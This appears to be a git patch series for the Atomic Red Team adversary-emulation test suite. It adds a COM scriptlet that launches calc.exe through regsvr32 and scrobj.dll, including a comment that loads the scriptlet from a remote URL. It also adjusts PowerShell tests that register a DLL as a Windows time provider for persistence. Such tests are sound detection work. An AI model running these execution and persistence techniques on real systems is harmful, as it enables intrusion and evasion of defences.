From 17c9a64fee09beef1b5150618362366b31382eb6 Mon Sep 17 00:00:00 2001
From: Carrie Roberts <clr2of8@gmail.com>
Date: Thu, 16 Jun 2022 14:41:09 -0600
Subject: [PATCH 1/3] recovered sct file from github history (#2000)

* Create T1218.003.sct

* Update T1218.003.inf
---
 atomics/T1218.003/src/T1218.003.inf |  2 +-
 atomics/T1218.003/src/T1218.003.sct | 23 +++++++++++++++++++++++
 2 files changed, 24 insertions(+), 1 deletion(-)
 create mode 100644 atomics/T1218.003/src/T1218.003.sct

diff --git a/atomics/T1218.003/src/T1218.003.inf b/atomics/T1218.003/src/T1218.003.inf
index 3c7a55e4..b41feb18 100644
--- a/atomics/T1218.003/src/T1218.003.inf
+++ b/atomics/T1218.003/src/T1218.003.inf
@@ -8,7 +8,7 @@ AdvancedINF=2.5
 UnRegisterOCXs=UnRegisterOCXSection
 
 [UnRegisterOCXSection]
-%11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1191/src/T1191.sct
+%11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1191/src/T1218.003.sct
 
 [Strings]
 AppAct = "SOFTWARE\Microsoft\Connection Manager"
diff --git a/atomics/T1218.003/src/T1218.003.sct b/atomics/T1218.003/src/T1218.003.sct
new file mode 100644
index 00000000..46ad832a
--- /dev/null
+++ b/atomics/T1218.003/src/T1218.003.sct
@@ -0,0 +1,23 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
+
+	<!-- .sct files when downloaded, are executed from a path like this -->
+	<!-- Please Note, file extenstion does not matter -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+  	<!-- You can either execute locally, or from a url -->
+	<script language="JScript">
+		<![CDATA[
+	    		// calc.exe should launch, this could be any arbitrary code.
+      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+
+		]]>
+</script>
+</registration>
+</scriptlet>

From 49b1dec3c624671462709545c9517e9ca14b3ae3 Mon Sep 17 00:00:00 2001
From: Jacques Decarie <traceflow@0x8d.cc>
Date: Thu, 16 Jun 2022 17:43:38 -0400
Subject: [PATCH 2/3] attempt to stop service first, in case its already
 running (#2001)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1547.003/T1547.003.yaml | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/atomics/T1547.003/T1547.003.yaml b/atomics/T1547.003/T1547.003.yaml
index 6acb6268..cd9602c4 100644
--- a/atomics/T1547.003/T1547.003.yaml
+++ b/atomics/T1547.003/T1547.003.yaml
@@ -14,6 +14,7 @@ atomic_tests:
   - windows
   executor:
     command: |
+      net stop w32time
       Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
       reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
       reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
@@ -23,6 +24,7 @@ atomic_tests:
       net stop w32time
       reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f
       rm -force C:\Users\Public\AtomicTest.dll
+      net start w32time
     name: powershell
     elevation_required: true
 
@@ -39,6 +41,7 @@ atomic_tests:
   - windows
   executor:
     command: |
+      net stop w32time
       Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
       reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
       reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
@@ -50,5 +53,6 @@ atomic_tests:
       reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "0" /f
       reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "0" /f
       rm -force C:\Users\Public\AtomicTest.dll
+      net start w32time
     name: powershell
     elevation_required: true
\ No newline at end of file

From 15270384cde0ef5094316eb759e767f6b2503724 Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator <opensource@redcanary.com>
Date: Thu, 16 Jun 2022 21:44:10 +0000
Subject: [PATCH 3/3] Generated docs from job=generate-docs branch=master [ci
 skip]

---
 atomics/Indexes/index.yaml     | 8 ++++++++
 atomics/T1547.003/T1547.003.md | 4 ++++
 2 files changed, 12 insertions(+)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 528e800d..eed0ab70 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -21561,6 +21561,7 @@ privilege-escalation:
       - windows
       executor:
         command: |
+          net stop w32time
           Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
           reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
           reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
@@ -21570,6 +21571,7 @@ privilege-escalation:
           net stop w32time
           reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f
           rm -force C:\Users\Public\AtomicTest.dll
+          net start w32time
         name: powershell
         elevation_required: true
     - name: Edit an existing time provider
@@ -21584,6 +21586,7 @@ privilege-escalation:
       - windows
       executor:
         command: |
+          net stop w32time
           Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
           reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
           reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
@@ -21595,6 +21598,7 @@ privilege-escalation:
           reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "0" /f
           reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "0" /f
           rm -force C:\Users\Public\AtomicTest.dll
+          net start w32time
         name: powershell
         elevation_required: true
   T1134.001:
@@ -55253,6 +55257,7 @@ persistence:
       - windows
       executor:
         command: |
+          net stop w32time
           Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
           reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
           reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
@@ -55262,6 +55267,7 @@ persistence:
           net stop w32time
           reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f
           rm -force C:\Users\Public\AtomicTest.dll
+          net start w32time
         name: powershell
         elevation_required: true
     - name: Edit an existing time provider
@@ -55276,6 +55282,7 @@ persistence:
       - windows
       executor:
         command: |
+          net stop w32time
           Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
           reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
           reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
@@ -55287,6 +55294,7 @@ persistence:
           reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "0" /f
           reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "0" /f
           rm -force C:\Users\Public\AtomicTest.dll
+          net start w32time
         name: powershell
         elevation_required: true
   T1205:
diff --git a/atomics/T1547.003/T1547.003.md b/atomics/T1547.003/T1547.003.md
index 05e779a6..eacd6918 100644
--- a/atomics/T1547.003/T1547.003.md
+++ b/atomics/T1547.003/T1547.003.md
@@ -36,6 +36,7 @@ Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003
 
 
 ```powershell
+net stop w32time
 Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
@@ -48,6 +49,7 @@ net start w32time
 net stop w32time
 reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f
 rm -force C:\Users\Public\AtomicTest.dll
+net start w32time
 ```
 
 
@@ -78,6 +80,7 @@ Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003
 
 
 ```powershell
+net stop w32time
 Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
@@ -92,6 +95,7 @@ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvid
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "0" /f
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "0" /f
 rm -force C:\Users\Public\AtomicTest.dll
+net start w32time
 ```